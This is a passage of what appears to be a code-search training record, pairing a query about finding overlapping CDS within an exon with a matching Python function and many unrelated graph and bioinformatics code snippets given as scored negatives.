tmpadjmat.iloc[i, j] + tmpadjmat.iloc[j, i]\n\n adjmat_directed=pd.DataFrame(index=adjmat.index, data=adjmat_directed, columns=adjmat.columns, dtype=bool)\n return(adjmat_directed)", "def edges(self):\n return self.generate_edges()", "def return_adj_nodes(self, node):\n\n return [node.above, node.right, node.below, node.left]", "def generate_full_adj(self):\n edges = np.zeros(shape=(self.n_balls, self.n_balls))\n row_idx = 0 # start filling adjacency mat from root node\n col_idx = 1 # skip the root node and start from 2nd node\n for l in range(self.nl):\n for n in range(self.nn[l]):\n edges[row_idx, col_idx:col_idx + self.nc[l]] = 1\n # Increase counters after filling connections for a parent node\n col_idx += self.nc[l]\n row_idx += 1\n return edges", "def outgoing_edges(self, vertices, labels=True):\n return list(self.outgoing_edge_iterator(vertices, labels=labels))", "def get_edge_ids(self):\n edge_ids = []\n \n for node_id in self.nodes:\n if (isinstance(self.nodes[node_id], EdgeNode)):\n edge_ids.append(node_id)\n \n return edge_ids", "def makeAdjArray(edges):\n adj_array = {}\n for edge in edges:\n if edge[0] not in adj_array.keys():\n adj_array[edge[0]] = [edge[1]]\n else:\n adj_array[edge[0]].append(edge[1])\n return adj_array", "def connectivity_matrix(self):\n # TODO: make this more memory efficient by ordering i,j in code when needed.\n temp = []\n for i in range(self.n_atom):\n for j in range(i+1, self.n_atom):\n if self.bond(i, j):\n temp.append([i+1, j+1])\n self.connect = np.asarray(temp)", "def incoming_edges(self, vertices, labels=True):\n return list(self.incoming_edge_iterator(vertices, labels=labels))", "def get_adjacency_list(self):\n \n # Get maximum node value\n max_index = max([node.value for node in self.nodes])\n \n # Initialize list long enough to reach max_index\n adjacency_list = [None] * (max_index+1)\n\n # Iterate over all edges\n for edge in self.edges:\n\n from_val = edge.node_from.value # Get node from value\n to_val = edge.node_to.value # Get node to value\n edge_val = edge.value # Get edge value\n\n # Store to and edge values at from value index\n # If there's already content stored at index...\n if adjacency_list[from_val]:\n # Append new content\n adjacency_list[from_val].append((to_val, edge_val))\n else:\n # Else, assign new content as a list\n adjacency_list[from_val] = [(to_val, edge_val)]\n \n # Return list of (to value, edge value) tuples indexed by from value\n return adjacency_list", "def matrix2list(vertex_matrix): \n flat_array = vertex_matrix.tolist() \n xy_list = [] \n for i in range(0, len(flat_array)): \n xy_list.append( flat_array[i][0] ) \n xy_list.append( flat_array[i][1] ) \n return xy_list" ]
[ "0.7220524", "0.7194223", "0.710978", "0.68476194", "0.6835649", "0.67063034", "0.67027074", "0.6680238", "0.6674114", "0.6642599", "0.66176134", "0.66089475", "0.6598832", "0.6533455", "0.65062785", "0.64912444", "0.64912444", "0.64545166", "0.6395245", "0.6378416", "0.6347094", "0.6315265", "0.63064957", "0.63022256", "0.629945", "0.6290077", "0.62740105", "0.62577325", "0.6244229", "0.62195337", "0.6215446", "0.61834216", "0.6164052", "0.6160751", "0.6153311", "0.6138986", "0.6114625", "0.6093784", "0.6068388", "0.605901", "0.60211277", "0.601924", "0.6016745", "0.6005025", "0.6004174", "0.599983", "0.599832", "0.599008", "0.5987456", "0.5986549", "0.5985013", "0.59843946", "0.59837186", "0.5976092", "0.5976065", "0.5973348", "0.5965731", "0.5960116", "0.59427994", "0.5937023", "0.5935431", "0.5935244", "0.5917532", "0.5913949", "0.59091526", "0.5909059", "0.59070325", "0.5905889", "0.5899804", "0.58909696", "0.58796847", "0.58777773", "0.5856892", "0.5850081", "0.5826045", "0.5824992", "0.58220994", "0.581805", "0.58118093", "0.5809153", "0.58063185", "0.57867616", "0.5782048", "0.57783306", "0.57584804", "0.5758409", "0.5755211", "0.57444096", "0.5734323", "0.5734323", "0.57111627", "0.5708976", "0.5705469", "0.57005715", "0.5697961", "0.56823486", "0.56812", "0.56727165", "0.5672185", "0.56552887" ]
0.69720167
3
Returns a list of successors by vertex, sensitive to the read strand
def get_successor_list(adj_matrix, vertex_map, read_strand): succ_list = [] assert (adj_matrix.shape[0] == adj_matrix.shape[1]) for idx in range(adj_matrix.shape[0]): succ_list.append([]) for jdx in range(adj_matrix.shape[0]): if adj_matrix[idx, jdx] == 1 and \ ((read_strand == "+" and vertex_map[0][idx] <= vertex_map[0][jdx]) or \ (read_strand == "-" and vertex_map[1][idx] >= vertex_map[1][jdx])): succ_list[idx].append(jdx) return succ_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_successors(vertex, graph):\n successors = list()\n successors.extend(graph.successors(vertex))\n return successors", "def get_predecessors_successors(vertex, graph):\n overlaps = list()\n pre = get_unique_predecessors(vertex, graph)\n suc = get_unique_successors(vertex, graph)\n overlaps.extend(pre)\n overlaps.extend(suc)\n return overlaps", "def get_unique_successors(vertex, graph):\n suc_nudes_in_stage_i = get_successors(vertex, graph)\n return remove_duplicates(suc_nudes_in_stage_i)", "def get_unique_predecessors_successors(vertex, graph):\n overlaps = get_predecessors_successors(vertex, graph)\n ov_unique = remove_duplicates(overlaps)\n return ov_unique", "def get_successors(self, node):\n succs = []\n parent_state = self.node_to_state(node)\n for it in self.children:\n child_node = (node[0] + it[0], node[1] + it[1])\n child_state = self.node_to_state(child_node)\n edge = self.interpolate(parent_state, child_state, self.distance_bw_states(parent_state, child_state)/self.path_resolution)\n succs.append([child_node, edge])\n return succs", "def _get_rhops(self, vertex: str) -> List[Tuple[str, str]]:\n if isinstance(vertex, rdflib.term.URIRef):\n vertex = Vertex(str(vertex)) # type: ignore\n elif isinstance(vertex, str):\n vertex = Vertex(vertex) # type: ignore\n hops = []\n\n predicates = self._transition_matrix[vertex]\n for pred in predicates:\n assert len(self._transition_matrix[pred]) == 1\n for obj in self._transition_matrix[pred]:\n hops.append((pred, obj))\n return hops", "def out_vertices(self, vertex):\n return self[vertex].keys()", "def get_unique_predecessors(vertex, graph):\n pre_nodes_in_stage_i = get_predecessors(vertex, graph)\n return remove_duplicates(pre_nodes_in_stage_i)", "def get_predecessors(vertex, graph):\n predecessors = list()\n predecessors.extend(graph.predecessors(vertex))\n return predecessors", "def vertices(self):\r\n return self.adjacent.keys()", "def obtener_vertices(self):\n return list(self.vertices.keys())", "def get_predecessors(self, pos: tuple):\n return self.get_successors(pos)", "def vertices_from_lines(lines):\n count = len(lines)\n print(\"Getting vertices 1/3\")\n pb = pbar.ProgressBar(count)\n vertices = []\n# print(\"getting vertices from line\")\n for line in lines:\n pb +=1\n vertices.extend(list(line.coords))\n del pb\n return [Point(p) for p in set(vertices)]", "def getAdjacentVertices(self, vertex):\n return self.adjList[vertex]", "def successors(state):\n free_coordinates = []\n for i in range(3):\n for j in range(3):\n if state[i][j] == '_':\n free_coordinates.append([i, j])\n\n return free_coordinates", "def successors(self, node: Node):\n return iter(self.get_node(node_id) for node_id in node.out_nodes_ids)", "def getStartVertex(self):", "def get_neighbors(self, vertex: Vertex) -> Set[Vertex]:\n if isinstance(vertex, str):\n vertex = Vertex(vertex)\n return self._transition_matrix[vertex]", "def _get_all_accessible_vertex_from_index(self, index: int) -> List[int]:\n # The index is the first one vertex\n visited_vertex = [index]\n vertex_to_visit = [index]\n\n while True:\n # Get next vertex to visit\n current_vertex = vertex_to_visit.pop()\n # Iterate over all vertexes that we can visit\n for vertex in self._graph[current_vertex]:\n if vertex not in visited_vertex:\n visited_vertex.append(vertex)\n vertex_to_visit.append(vertex)\n\n if not vertex_to_visit:\n break\n\n return visited_vertex", "def vertex_generator(self):\n for V in self.Vrepresentation():\n if V.is_vertex():\n yield V", "def return_adjacencies(self, vertex: np.int_):\n return self.__adj[vertex]", "def _get_shops(self, vertex: str) -> List[Tuple[str, str]]:\n if not vertex.startswith(\"http://\"):\n return []\n self.endpoint.setQuery(\n \"\"\"\n SELECT ?p ?o WHERE {\n <\"\"\"\n + str(vertex)\n + \"\"\"> ?p ?o .\n }\n \"\"\"\n )\n\n self.endpoint.setReturnFormat(JSON)\n results = self.endpoint.query().convert()\n neighbors = []\n for result in results[\"results\"][\"bindings\"]:\n predicate, obj = result[\"p\"][\"value\"], result[\"o\"][\"value\"]\n if predicate not in self.label_predicates:\n neighbors.append((predicate, obj))\n return neighbors", "def vertices_at_least_once(self):\n clauses = []\n for vertex in range(0,self.graph.num_vertices):\n clauses.append(self.vertex_at_least_once(vertex))\n return clauses", "def get_successors(node, grid):\n successors = []\n\n node_x, node_y = node\n n_rows = len(grid)\n n_cols = len(grid[0])\n\n for dx, dy in product([-1,0,1],[-1,0,1]):\n # skip the current node itself\n if (dx == 0 and dy == 0):\n continue\n\n x = node_x + dx\n y = node_y + dy\n\n if (0 <= x < n_rows and 0 <= y < n_cols):\n cost = grid[y][x]\n else:\n # put infinite penalty on successors that would take us off the edge of the grid\n cost = inf\n\n successors.append( ((x, y), cost) )\n\n return successors", "def get_successors(node, grid):\n successors = []\n\n node_x, node_y = node\n n_rows = len(grid)\n n_cols = len(grid[0])\n\n for dx, dy in product([-1,0,1],[-1,0,1]):\n # skip the current node itself\n if (dx == 0 and dy == 0):\n continue\n\n x = node_x + dx\n y = node_y + dy\n\n if (0 <= x < n_rows and 0 <= y < n_cols):\n cost = grid[y][x]\n else:\n # put infinite penalty on successors that would take us off the edge of the grid\n cost = inf\n\n successors.append( ((x, y), cost) )\n\n return successors", "def get_all_vertices(self):\r\n for vertex in self.__neighbours.keys():\r\n yield vertex", "def vertex_at_most_once(self,vertex):\n clauses = []\n for (p1,p2) in itertools.combinations(range(0,self.graph.num_vertices),2):\n clause = [ ClauseVariable(True,vertex,p1),\n ClauseVariable(True,vertex,p2)]\n clauses.append(clause)\n return clauses", "def vertices(self):\n \n yielded = set()\n \n # Iterate over every tuple of edges, e.g. ..., (1, 2), (4, 3), ...\n for vertices in self.edges():\n # Iterate over every vertex in the tuple, e.g. ..., 1, 2, 4, 3, ...\n for vertex in vertices:\n # Yield if it has not been yielded already\n if vertex not in yielded:\n yield vertex", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n # Add a successor state to the successor list if the action is legal\n # Here's a code snippet for figuring out whether a new position hits a wall:\n x, y = state[0]\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n hitsWall = self.walls[nextx][nexty]\n\n if not hitsWall:\n successors.append((((nextx,nexty), self.visited_corner), action, 1))\n \"*** YOUR CODE HERE ***\"\n\n return successors", "def vertices(self):\n return self.keys()", "def vertices_saturating(self, constraint):\n from sage.libs.ppl import C_Polyhedron, Poly_Con_Relation\n result = []\n for i,v in enumerate(self.minimized_generators()):\n v = C_Polyhedron(v)\n if v.relation_with(constraint).implies(Poly_Con_Relation.saturates()):\n result.append(self.vertices()[i])\n return tuple(result)", "def vertex_at_least_once(self,vertex):\n clauses = []\n for position in range(0,self.graph.num_vertices):\n clauses.append(ClauseVariable(False,position,vertex))\n return clauses", "def find_nodes(shp):\n node_count = {}\n for road in shp:\n vrts = road.vertices\n for node in vrts:\n if node not in node_count:\n node_count[node] = 0\n node_count[node] += 1\n node_count[vrts[0]] += 1\n node_count[vrts[-1]] += 1\n return set([node for node,c in node_count.iteritems() if c > 1])", "def canonical_vertex(self):\n return self.L.zero(), self.K.one()", "def hamilton(graph: nx.DiGraph, vertex_count, start_vertex, path=None, visited=None):\n if visited is None:\n visited = []\n\n if path is None:\n path = []\n\n # if start_vertex not in path:\n # path.append(start_vertex)\n\n if len(path) == vertex_count:\n return path\n\n sucessor_vertices = graph.successors(start_vertex)\n\n for successor in sucessor_vertices:\n if successor not in set(visited):\n # Then visit\n visited.append(successor)\n path.append(successor)\n candidate = hamilton(graph, vertex_count, successor, path, visited)\n\n if candidate:\n return candidate\n\n visited.pop()\n path.pop()", "def get_vertices(self):\n return self.vertList.keys()", "def get_conn_component(T, u):\n # Holds vertices, which have been already visited so the algorithm won't\n # process them again\n visited = []\n # Holds the frontier of the explored area. Vertices to be visited\n # and expanded are chosen from this list\n frontier = [u]\n\n # Following code is a basic DFS, which collects all vertices it explored\n # Invariant : Visited list keeps its property defined higher\n # Variant : Frontier list being reduced by 1 and then expanded by 0...deg(vertex)\n while len(frontier) != 0:\n vertex = frontier.pop()\n\n # Invariant : Frontier list keeps its property defined higher\n # Variant : child vertex of the one currently being expanded\n for child in T[vertex]:\n if not visited.__contains__(child) and not frontier.__contains__(child):\n frontier.append(child)\n visited.append(vertex)\n\n return visited", "def vertex_iterator(self):\n for X in self.fe.L:\n for x in self.K.unit_group:\n yield (X, x)", "def vertices(self):\n return self.pointlist", "def getSuccessors(self, currentPos, wallList, grid):\n x, y = currentPos\n fourDirections = [(x-1, y, Directions.WEST), (x+1, y, Directions.EAST), \\\n (x, y+1, Directions.NORTH), (x, y-1, Directions.SOUTH)]\n return filter(lambda successorPos: self.isValidPos(successorPos[0], successorPos[1], wallList, grid), fourDirections)", "def get_successors(self):\n \n raise AIError(\"Must be implemented in child class!\")", "def succnodes(self):\n return self._data[1]", "def getSuccessors(self, state):\n successors = []\n x, y = state[0]\n visitedCorners = state[1]\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n # Add a successor state to the successor list if the action is legal\n # Here's a code snippet for figuring out whether a new position hits a wall:\n # x,y = currentPosition\n # dx, dy = Actions.directionToVector(action)\n # nextx, nexty = int(x + dx), int(y + dy)\n # hitsWall = self.walls[nextx][nexty]\n\n\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n hitsWall = self.walls[nextx][nexty]\n if not hitsWall:\n # Initialize a list of Visited corners for a successor using the visited corner list in state space.\n successorVisitedCorners = list(visitedCorners)\n next_node = (nextx, nexty)\n # Add node to the Visited corner list if it is a corner and not already in the list\n if next_node in self.corners:\n if not next_node in successorVisitedCorners:\n successorVisitedCorners.append(next_node)\n # Create a new state according to the state space and append it to the successor list.\n successor = ((next_node, successorVisitedCorners), action, 1)\n successors.append(successor)\n\n self._expanded += 1 # DO NOT CHANGE\n\n return successors", "def get_neighbours(self, vertex):\n output = []\n \n if vertex in self.adjacency_list:\n for neighbour in self.adjacency_list[vertex]:\n output.append([neighbour.vertex.value, neighbour.weight])\n \n return output", "def getSuccessors(self, state):\n\t\tutil.raiseNotDefined()", "def vertices(size):\n return set(range(size))", "def get_vertices(self):\n return list(self.vertices.keys())", "def get_successors(self, task):\n raise NotImplementedError(\"This method should be implemented.\")", "def vertex_adjacencies(self):\n try:\n return self._vertex_adjacencies\n except AttributeError:\n self._vertex_adjacencies = \\\n [ [ v.index(), \n [n.index() for n in v.neighbors()] \n ] for v in self.Vrepresentation() ]\n return self._vertex_adjacencies", "def get_vertices(self) -> []:\n return [i for i in self.adj_list]", "def get_successors(self, sas_task: SASTask) -> Generator:\n operator_names = [operator.name for operator in sas_task.operators]\n random.Random(SEED).shuffle(operator_names)\n for name in operator_names:\n pre_child = copy.deepcopy(sas_task)\n with timers.timing(\"Obtaining successor\"):\n child = self.transform(pre_child, name)\n yield child, name", "def parse_vertex(lines):\n print \" * Parsing vertex\"\n return _parse_vn(lines, \"v %.6f %.6f %.6f\")", "def neighbor_in_iterator(self, vertex):\n return iter(set(self._backend.iterator_in_nbrs(vertex)))", "def ordenar_vertices(grafo, distancia):\n return list(sorted(distancia.items(),key = lambda x:x[1] , reverse = True ))", "def get_vertices(self):\n return self.graph.keys()", "def get_vertices(self):\n if self.vert_list.keys() != None:\n return self.vert_list.keys()\n raise KeyError(\"Vertex not found\")", "def vertices(self):\n return list(self.graph_dict.keys())", "def vertices(tri, vertex_list):\n dim = len(vertex_list[0])\n p = numpy.zeros((3, dim))\n for j in range(3):\n p[j] = vertex_list[tri[j]]\n return p", "def _anchored_successors(self, n):\n\n # loop on all outgoing edges\n for t in self.successors(n):\n \n # if neighbor is anchored\n # stop looking for (necessarily later) successors\n if t.anchored:\n yield t\n continue\n\n # if neighbor is not anchored\n # look one level deeper\n for tt in self._anchored_successors(t):\n yield tt", "def get_vertex_keys(self):\n return self.vertList.keys()", "def get_successors(self, sas_task):\n raise NotImplementedError(\"This method should be implemented.\")", "def neighbors_in(self, vertex):\n return list(self.neighbor_in_iterator(vertex))", "def getSuccessors(self, currentPosition):\n successors = []\n walls = self.walls\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x, y = currentPosition\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if (nextx, nexty) not in walls:\n nextPosition = (nextx, nexty)\n successors.append((action, nextPosition))\n return successors", "def vertices(self):\n try:\n return self._vertices\n except:\n self._vertices = [list(x) for x in self.vertex_generator()]\n return self._vertices", "def pairs_of_vertices(self):\n pairs_of_vertices = []\n for vertice in self.list_of_vertices:\n for edge in vertice.edges_list:\n if non_oriented:\n if (vertice, edge.linked[1]) and (edge.linked[1], vertice) not in pairs_of_vertices:\n pairs_of_vertices.append((vertice, edge.linked[1]))\n if not non_oriented:\n if (vertice, edge.linked[1]) not in pairs_of_vertices:\n pairs_of_vertices.append((vertice, edge.linked[1]))\n return pairs_of_vertices", "def vertices(self):\r\n return list(self.__graph_dict.keys())", "def allsuccessors(obsstore, nodes, ignoreflags=0):\n remaining = set(nodes)\n seen = set(remaining)\n while remaining:\n current = remaining.pop()\n yield current\n for mark in obsstore.successors.get(current, ()):\n # ignore marker flagged with with specified flag\n if mark[2] & ignoreflags:\n continue\n for suc in mark[1]:\n if suc not in seen:\n seen.add(suc)\n remaining.add(suc)", "def get_predecessors(self, node): \n preds = []\n child_state = self.node_to_state(node)\n for it in self.predecessors:\n parent_node = (node[0] + it[0], node[1] + it[1])\n parent_state = self.node_to_state(parent_node)\n edge = self.interpolate(child_state, parent_state, self.distance_bw_states(child_state, parent_state)/self.path_resolution)\n preds.append([parent_node, edge])\n return preds", "def trees(vertices):\n from sage.graphs.trees import TreeIterator\n return iter(TreeIterator(vertices))", "def vertices(self) -> list[Point]:\n first_polygon_index = self.rank - max(self.pdim - 1, 1) - 1\n new_shape = self.shape[:first_polygon_index] + (-1, self.shape[-1])\n array = self.array.reshape(new_shape)\n return list(distinct(Point(x, copy=False) for x in np.moveaxis(array, -2, 0)))", "def MeshVtxAdjacentVtxs (strMesh, index, blnAbsolutConnections=False, blnCreate=False):\n \"\"\"custom function\"\"\"\n #-----------------------------------------------------------------------------------------------------------------------------------------\n def CullDuplicates(seq, idfun=None): \n # order preserving \n if idfun is None: \n def idfun(x): return x \n seen = {} \n result = [] \n for item in seq: \n marker = idfun(item) \n if marker in seen: continue \n seen[marker] = 1 \n result.append(item) \n return result\n #-----------------------------------------------------------------------------------------------------------------------------------------\n MeshVtxAdjacentVtxs = []\n if rs.IsMesh(strMesh)==False : \n print \"strMesh is not an mesh\"\n return None\n if type(index)==type(\"string\"):\n print \"index is not an integer\"\n return None\n if type(index)==type(0.1): index = int(index)\n\n arrVertices = rs.MeshVertices (strMesh)\n arrFaceVertices = rs.MeshFaceVertices(strMesh)\n\n intCount = 0\n arrAdjacentVtxs = []\n for arrFace in arrFaceVertices:\n blnIsAdjacent = False\n for arrVtxIndex in arrFace:\n if arrVtxIndex == index :\n blnIsAdjacent = True\n if blnIsAdjacent :\n if blnAbsolutConnections :\n if arrFace[2]==arrFace[3] :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex)\n else :\n if index == arrFace[0] :\n arrAdjacentVtxs.append( arrFace[3] )\n arrAdjacentVtxs.append( arrFace[1] )\n elif index == arrFace[1] :\n arrAdjacentVtxs.append( arrFace[0] )\n arrAdjacentVtxs.append( arrFace[2] )\n elif index == arrFace[2] :\n arrAdjacentVtxs.append( arrFace[1] )\n arrAdjacentVtxs.append( arrFace[3] )\n elif index == arrFace(3) :\n arrAdjacentVtxs.append( arrFace[2] )\n arrAdjacentVtxs.append( arrFace[0] )\n else :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex )\n if type(arrAdjacentVtxs) != type([]) : return None\n arrOrderAdjacentVtxs = CullDuplicates(arrAdjacentVtxs)\n if blnCreate :\n arrStrPts = []\n for arrVtxIndex in arrOrderAdjacentVtxs:\n rs.AddPoint ( arrVertices[arrVtxIndex] )\n arrStrPts.append( arrVertices[arrVtxIndex] )\n return arrStrPts\n else :\n return arrOrderAdjacentVtxs", "def getVertices(self):\n return self.vertexIndex", "def vertices(self):\n s = set([x for x in self.edges.keys()])\n t = set([y for v in self.edges.values() for (y,d) in v.items()])\n v = s.union(t)\n return list(v)", "def shortest_path_search(start, successors, is_goal):\n if is_goal(start): return [start]\n explored = set()\n frontier = [[start]]\n while frontier:\n path = frontier.pop(0)\n s = path[-1]\n for (state,action) in successors(s).items():\n if state not in explored:\n explored.add(state)\n npath = path + [action,state]\n if is_goal(state): return npath\n else: frontier.append(npath)\n return []", "def vertices(self):\n return list(self.__graph.values())", "def getVertexNumbers(self):\n return self.vertexIndex.keys()", "def neighbor_out_iterator(self, vertex):\n return iter(set(self._backend.iterator_out_nbrs(vertex)))", "def get_successors(self, sas_task) -> Generator:\n variables = [var for var in range(len(sas_task.variables.axiom_layers))]\n random.Random(SEED).shuffle(variables)\n for var in variables:\n pre_child = copy.deepcopy(sas_task)\n with timers.timing(\"Obtaining successor\"):\n child = self.transform(pre_child, var)\n yield child, var", "def adjacence(self) -> List[List[Poids]]:\n resultat = list()\n for depart in self.sommets:\n ligne = list()\n for arrivee in self.sommets:\n if arrivee in self._voisinage[depart]:\n ligne.append(self._voisinage[depart][arrivee])\n else:\n ligne.append(0)\n resultat.append(ligne)\n return resultat", "def neighbors_out(self, vertex):\n return list(self.neighbor_out_iterator(vertex))", "def task1(graph, n):\r\n alreadyProcessed = set()\r\n B = [j for j in range(1,n+1)]\r\n position = {B[i]:i for i in range(len(B))}\r\n leftNeighbors = {}\r\n parent = {}\r\n \r\n for v in B:\r\n # nodes processed before the current that have an edge in common are left neighbors\r\n leftNeighbors[v] = set(graph._graph[v]) & alreadyProcessed\r\n alreadyProcessed.add(v)\r\n if leftNeighbors[v]:\r\n # the parent is the closest left neighbor \r\n parent[v] = B[max([position[w] for w in leftNeighbors[v]])]\r\n # if this node's neighbors (other then the parent itself) are not a subset of the parent's neighbors \r\n # it means that it's not a lexOrder\r\n if not leftNeighbors[v] - {parent[v]} <= leftNeighbors[parent[v]]:\r\n return []\r\n return B", "def list_vertices(self):\n return list(self.graph_dict.keys())", "def vertices(self):\n return list(self._graph)", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def vertices(self):\n return list(self.__graph_dict.keys())", "def iterator(self):\n return _osgAnimation.VertexList_iterator(self)", "def candidates(vertex, index, image, binary_sm, unary_sm, counts, empty):\n for k in image:\n if k == index:\n continue\n if counts[index] > 1 or counts[k] > 1:\n yield k\n elif vertex < unary_sm[k]: # implicitly: counts[index]==1 and counts[k]==1\n yield k\n if counts[index] > 2 or (counts[index] == 2 and vertex==binary_sm[index]):\n yield empty", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x,y = state\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if not self.walls[nextx][nexty]:\n nextState = (nextx, nexty)\n cost = self.costFn(nextState)\n successors.append( ( nextState, action, cost) )\n\n # Bookkeeping for display purposes\n self._expanded += 1 # DO NOT CHANGE\n if state not in self._visited:\n self._visited[state] = True\n self._visitedlist.append(state)\n\n return successors", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x,y = state\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if not self.walls[nextx][nexty]:\n nextState = (nextx, nexty)\n cost = self.costFn(nextState)\n successors.append( ( nextState, action, cost) )\n\n # Bookkeeping for display purposes\n self._expanded += 1\n if state not in self._visited:\n self._visited[state] = True\n self._visitedlist.append(state)\n\n return successors", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n x, y = state\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n if not self.walls[nextx][nexty]:\n nextState = (nextx, nexty)\n cost = self.costFn(nextState)\n successors.append((nextState, action, cost))\n\n # Bookkeeping for display purposes\n self._expanded += 1 # DO NOT CHANGE\n if state not in self._visited:\n self._visited[state] = True\n self._visitedlist.append(state)\n\n return successors", "def triples():", "def get_successors(state): \n \n child_states = []\n \n size = len(state)\n i = 0\n j = 0\n for i in range (size):\n if 0 in state[i]:\n for j in range (size):\n if state[i][j] == 0:\n break \n break\n\n if j != size-1:\n child_states.append ((\"Left\", swap_cells(state, i, j, i, j+1)))\n if j != 0:\n child_states.append ((\"Right\", swap_cells(state, i, j, i, j-1)))\n if i != size-1:\n child_states.append ((\"Up\", swap_cells(state, i, j, i+1, j)))\n if i != 0:\n child_states.append ((\"Down\", swap_cells(state, i, j, i-1, j)))\n \n return child_states", "def vertices(self):\n return self._outgoing.keys()", "def get_successors(self, task) -> Generator:\n object_names = [obj.name for obj in task.objects]\n random.Random(SEED).shuffle(object_names)\n for name in object_names:\n pre_child = copy.deepcopy(task)\n with timers.timing(\"Obtaining successor\"):\n child = pre_child.accept(TaskElementEraseObjectVisitor(name))\n yield child, name", "def get_vertices(self, crs=None):\n if crs is None:\n vertices = []\n for poly_vertices in self.vertices:\n vertices.append([np.array(v) for v in poly_vertices])\n return vertices\n else:\n vertices = []\n for poly_vertices in self.vertices:\n poly = []\n for ring_vertices in poly_vertices:\n poly.append(np.array([_reproject(v[:2], self.crs, crs)\n for v in ring_vertices]))\n vertices.append(poly)\n return vertices", "def get_vertices(self):\n return self.vertices", "def get_vertices(self):\n return self.vertices", "def split_at_nodes(shp):\n nodes = find_nodes(shp)\n nodeIds = list(nodes)\n nodeIds.sort()\n nodeIds = dict([(node,i) for i,node in enumerate(nodeIds)])\n \n for road in shp:\n vrts = road.vertices\n midVrts = set(road.vertices[1:-1]) #we know end points are nodes\n midNodes = midVrts.intersection(nodes) # find any nodes in the middle of the feature.\n midIdx = [vrts.index(node) for node in midNodes] # Get their indices\n midIdx.sort()\n if midIdx:\n #print vrts\n starts = [0]+midIdx\n stops = [x+1 for x in midIdx]+[None]\n for start,stop in zip(starts,stops):\n feat = pysal.cg.Chain(vrts[start:stop])\n rec = (nodeIds[feat.vertices[0]],nodeIds[feat.vertices[-1]],False)\n yield feat,rec\n else:\n rec = (nodeIds[road.vertices[0]],nodeIds[road.vertices[-1]],False)\n yield road,rec", "def gen_clustlst(number_of_antecessors, linked_clusters, antecessors):\n clustlst = []\n for j in range(number_of_antecessors):\n lst = []\n for k in range(len(linked_clusters)):\n if linked_clusters[k].antecessor == antecessors[j]:\n lst.append(linked_clusters[k])\n clustlst.append(lst)\n lst = None\n return clustlst" ]
[ "0.7708114", "0.6563205", "0.6376617", "0.6307063", "0.62348616", "0.61934036", "0.60396194", "0.594999", "0.59440297", "0.58112705", "0.57270694", "0.5720067", "0.57045156", "0.5680978", "0.5673067", "0.5660702", "0.56433517", "0.5618526", "0.5613443", "0.5608551", "0.5604928", "0.55698925", "0.55495137", "0.5542951", "0.5542951", "0.5515883", "0.54981035", "0.54907554", "0.5488285", "0.5480832", "0.54760253", "0.54534036", "0.54429144", "0.5438047", "0.5429367", "0.54154366", "0.54104245", "0.539609", "0.53959167", "0.5395785", "0.5395773", "0.5381609", "0.53788954", "0.5372012", "0.53594965", "0.53530556", "0.53493536", "0.5338477", "0.5332277", "0.5328952", "0.5325374", "0.53140396", "0.5298603", "0.52918977", "0.5289509", "0.52841425", "0.5280532", "0.5277066", "0.5276368", "0.52735966", "0.5267273", "0.5264676", "0.52625084", "0.5261416", "0.52550805", "0.5252666", "0.52511317", "0.5239055", "0.5238526", "0.52380264", "0.5237909", "0.52338", "0.52328", "0.52257", "0.52249044", "0.52208686", "0.52042603", "0.5192662", "0.5192201", "0.5187628", "0.5183432", "0.5179905", "0.51666945", "0.51626897", "0.51626897", "0.51626897", "0.51539385", "0.515168", "0.51507324", "0.51441264", "0.5138965", "0.513833", "0.51368207", "0.51332295", "0.5129403", "0.5126816", "0.5123672", "0.5123672", "0.5119859", "0.51171875" ]
0.6470455
2
Find overlapping CDS within an exon given a list of CDS starts
def find_overlapping_cds_simple(v_start, v_stop, cds_begins, strand): # cds_start = cds_begin[0] if strand == '+': return list(filter(lambda x: x[0] >= v_start and x[0] < v_stop, cds_begins)) else: return list(filter(lambda x: x[0] > v_start and x[0] <= v_stop, cds_begins))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def overlap(list1,list2):\n \n coord=[]\n for pos1 in list1:\n #print 'pos in list1 is', pos1\n coord.append(('S',int(pos1.split('-')[0]), 'l1'))\n #print 'S is ', pos1.split('-')[0]\n coord.append(('E',int(pos1.split('-')[1]),'l1'))\n #print 'E is ', pos1.split('-')[1]\n #print coord \n for pos2 in list2:\n #print 'pos in list2 is', pos2\n coord.append(('S',int(pos2.split('-')[0]),'l2'))\n #print 'S is ', pos2.split('-')[0]\n coord.append(('E', int(pos2.split('-')[1]),'l2'))\n #print 'E is ', pos2.split('-')[1]\n #print coord\n \n coord.sort(key = lambda x : x[0], reverse = True)\n #print 'coord after first sort \\n', coord\n coord.sort(key = lambda x : x[1])\n #print 'coord after 2nd sort by number \\n', coord\n # PART 1: SEARCHES FOR OVERLAPS BETWEEN 2 HISTONE MARKS\n new_coord_list = [] #initialize new list to which to move all those that don't overlap\n #index = 0 #position in list \n spos=0 # start pos initialized \n ct=0\n ovl=[]\n for pos in coord:\n new_coord_list.append(pos)\n #print pos, 'doesn\\'t overlap'\n 